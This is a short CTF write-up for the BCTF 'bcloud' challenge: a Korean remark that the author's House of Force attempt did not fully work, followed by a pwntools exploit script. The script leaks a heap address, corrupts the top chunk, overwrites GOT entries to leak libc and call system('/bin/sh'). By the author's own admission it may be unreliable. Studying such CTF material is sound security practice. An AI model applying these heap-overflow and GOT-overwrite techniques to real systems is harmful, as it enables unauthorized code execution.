BCTF bcloud

후기 : HOF를 이용해서 배열로 관리되는 콘텐트의 GOT를 덮어 익스플로잇 하려고 했는데 잘 되지 않아 나중에 다시 잡아보려 한다... ㅠㅠ

from pwn import *
s = remote('localhost', 4000)

elf = ELF('/home/cdor1/pwnable/bcloud')
libc = ELF('/home/cdor1/pwnable/libc.so.6_cdor1')

atoi = elf.got['atoi']
free = elf.got['free']
printf = elf.plt['printf']
bss = elf.bss()
offset = libc.symbols['system'] - libc.symbols['atoi']

print s.recvuntil('Input your name:')
s.sendline('A'*60 + 'B'*4)
s.recvuntil('BBBB')
heap_base = u32(s.recv(4))
topch = heap_base + 0xd8
print s.recvuntil('Org:')
s.sendline('A'*64)
print s.recvuntil('Host:')
s.sendline('\xff\xff\xff\xff')

print s.recvuntil('option--->>')
s.sendline('1')
print s.recvuntil('Input the length of the note content:')
vuln_size = (bss - topch) - 0x08
s.sendline(str(vuln_size))

payload = p32(4)
payload += p32(4)
payload += p32(4)
payload += p32(0) * 29
payload += p32(atoi)
payload += p32(free)
payload += p32(atoi)
payload += p32(0) * 8

print s.recvuntil('option--->>')
s.sendline('1')
print s.recvuntil('Input the length of the note content:')
s.sendline(len(payload))
print s.recvuntil('Input the content:')
s.sendline(payload)

print s.recvuntil('option--->>')
s.sendline('3')
print s.recvuntil('Input the id:')
s.sendline('1')
print s.recvuntil('Input the new content:')
s.sendline(p32(printf))

print s.recvuntil('option--->>')
s.sendline('4')
print s.recvuntil('Input the id:')
s.sendline('0')

libc_atoi = u32(s.recv(4))
libc_system = libc_atoi + offset

print s.recvuntil('option--->>')
s.sendline('3')
print s.recvuntil('Input the id:')
s.sendline('2')
print s.recvuntil('Input the new content:')
s.sendline(p32(libc_system))

print s.recvuntil('option--->>')
s.sendline('/bin/sh\x00')

s.interactive()